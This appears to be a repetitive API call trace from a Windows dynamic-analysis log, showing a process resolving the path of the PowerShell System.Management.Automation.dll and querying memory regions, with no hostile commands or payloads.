	[0401.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.522] VirtualQuery (in: lpAddress=0x26b1f0, lpBuffer=0x26c0b0, dwLength=0x30 | out: lpBuffer=0x26c0b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.523] VirtualQuery (in: lpAddress=0x26b1f0, lpBuffer=0x26c0b0, dwLength=0x30 | out: lpBuffer=0x26c0b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.523] VirtualQuery (in: lpAddress=0x26b280, lpBuffer=0x26c140, dwLength=0x30 | out: lpBuffer=0x26c140*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.523] VirtualQuery (in: lpAddress=0x26b1f0, lpBuffer=0x26c0b0, dwLength=0x30 | out: lpBuffer=0x26c0b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.524] VirtualQuery (in: lpAddress=0x26b280, lpBuffer=0x26c140, dwLength=0x30 | out: lpBuffer=0x26c140*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.524] VirtualQuery (in: lpAddress=0x26b1f0, lpBuffer=0x26c0b0, dwLength=0x30 | out: lpBuffer=0x26c0b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.524] VirtualQuery (in: lpAddress=0x26b280, lpBuffer=0x26c140, dwLength=0x30 | out: lpBuffer=0x26c140*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.525] VirtualQuery (in: lpAddress=0x26b1f0, lpBuffer=0x26c0b0, dwLength=0x30 | out: lpBuffer=0x26c0b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.525] VirtualQuery (in: lpAddress=0x26b280, lpBuffer=0x26c140, dwLength=0x30 | out: lpBuffer=0x26c140*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.526] VirtualQuery (in: lpAddress=0x26b1f0, lpBuffer=0x26c0b0, dwLength=0x30 | out: lpBuffer=0x26c0b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.526] VirtualQuery (in: lpAddress=0x26b280, lpBuffer=0x26c140, dwLength=0x30 | out: lpBuffer=0x26c140*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.527] VirtualQuery (in: lpAddress=0x26b1f0, lpBuffer=0x26c0b0, dwLength=0x30 | out: lpBuffer=0x26c0b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.527] VirtualQuery (in: lpAddress=0x26b280, lpBuffer=0x26c140, dwLength=0x30 | out: lpBuffer=0x26c140*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.528] VirtualQuery (in: lpAddress=0x26bc90, lpBuffer=0x26cb50, dwLength=0x30 | out: lpBuffer=0x26cb50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
